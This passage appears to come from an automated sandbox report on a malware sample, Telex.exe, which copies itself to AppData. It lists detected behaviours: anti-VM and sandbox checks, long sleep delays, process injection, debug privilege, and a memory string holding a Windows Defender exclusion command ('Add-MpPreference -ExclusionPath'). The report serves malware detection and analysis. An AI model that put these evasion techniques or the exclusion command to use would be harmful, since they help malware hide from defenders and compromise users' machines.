                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\Telex.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Telex.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Telex.exe PID: 6352, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: mDPTQJF1.exe PID: 4652, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Telex.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Telex.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Telex.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Telex.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Telex.exeWindow / User API: threadDelayed 4116
                      Source: C:\Users\user\Desktop\Telex.exeWindow / User API: threadDelayed 5686
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeWindow / User API: threadDelayed 9320
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeWindow / User API: threadDelayed 485
                      Source: C:\Users\user\Desktop\Telex.exe TID: 6356Thread sleep time: -101782s >= -30000s
                      Source: C:\Users\user\Desktop\Telex.exe TID: 6384Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Telex.exe TID: 6860Thread sleep time: -23058430092136925s >= -30000s
                      Source: C:\Users\user\Desktop\Telex.exe TID: 6868Thread sleep count: 4116 > 30
                      Source: C:\Users\user\Desktop\Telex.exe TID: 6868Thread sleep count: 5686 > 30
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 2200Thread sleep time: -101582s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6156Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6984Thread sleep time: -11990383647911201s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6672Thread sleep count: 9320 > 30
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6984Thread sleep count: 53 > 30
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6672Thread sleep count: 485 > 30
                      Source: C:\Users\user\Desktop\Telex.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Telex.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Telex.exeThread delayed: delay time: 101782
                      Source: C:\Users\user\Desktop\Telex.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Telex.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeThread delayed: delay time: 101582
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeThread delayed: delay time: 922337203685477
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: Telex.exe, 00000001.00000002.508483412.00000000064A8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Telex.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E4988 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\Telex.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Telex.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\Telex.exeMemory written: C:\Users\user\Desktop\Telex.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeMemory written: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Telex.exeProcess created: C:\Users\user\Desktop\Telex.exe C:\Users\user\Desktop\Telex.exe
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Progman
